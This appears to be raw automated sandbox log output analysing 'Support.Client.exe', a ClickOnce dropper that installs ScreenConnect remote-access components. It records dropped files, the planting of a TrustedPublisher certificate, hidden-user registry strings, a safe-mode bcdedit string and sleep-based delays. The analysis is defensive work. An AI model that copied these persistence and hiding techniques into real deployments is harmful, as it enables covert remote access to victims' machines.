                  Source: Support.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Support.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Support.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Support.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Support.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr Static PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: Support.Client.exe Static PE information: real checksum: 0x1bda6 should be: 0x19cbe
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01BC0 push ecx; ret 0_2_00C01BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B898E01 push 8B495D39h; iretd 1_2_00007FFD9B898E0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B887D00 push eax; retf 1_2_00007FFD9B887D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B898D31 push 8B495D39h; iretd 1_2_00007FFD9B898D3C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B88842E pushad ; ret 1_2_00007FFD9B88845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B8A9360 push cs; ret 1_2_00007FFD9B8A937F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B8A9321 push cs; ret 1_2_00007FFD9B8A937F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B8800BD pushad ; iretd 1_2_00007FFD9B8800C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B8AA650 pushfd ; ret 1_2_00007FFD9B8AA5E6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFD9B88845E push eax; ret 1_2_00007FFD9B88846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B884162 push eax; ret 9_2_00007FFD9B884163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B8830BA push eax; iretd 9_2_00007FFD9B8830BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B88401A push eax; iretd 9_2_00007FFD9B88401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B882FDA pushad ; retf 9_2_00007FFD9B882FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B883F3A pushad ; retf 9_2_00007FFD9B883F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B882E18 push eax; ret 9_2_00007FFD9B882E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Code function: 12_2_00007FFD9BB97B30 push ss; iretd 12_2_00007FFD9BB97B31
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (12a62791-f49c-4806-9cc2-0b20f2ce6bb8)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2133716671.0000000002DA2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2946951475.000000001B400000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2939873486.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Support.Client.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 2513E810000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 251583C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Memory allocated: F20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Memory allocated: 1AE80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Memory allocated: 12B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Memory allocated: 2E50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Memory allocated: 12B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Memory allocated: 1B10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Memory allocated: 1CF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Memory allocated: 3CF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Memory allocated: 10E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599874
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599765
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599653
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599540
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599413
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599302
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599185
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599017
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598849
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598625
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598265
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597991
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597872
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597763
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597655
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597544
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597422
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597297
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597187
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597078
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596969
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596844
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596734
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596624
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596503
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596375
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596265
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596156
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595936
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595824
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595679
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595552
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595249
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595125
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595015
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594905
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594794
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594687
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594562
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594452
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594328
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594218
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594108
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593984
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593874
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593760
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593655
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593531
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593421
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593312
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593202
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593092
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 2611
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 6912
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Users\user\Desktop\Support.Client.exe TID: 7572 Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -34126476536362649s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599874s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599765s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599653s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599540s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599413s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599302s >= -30000s
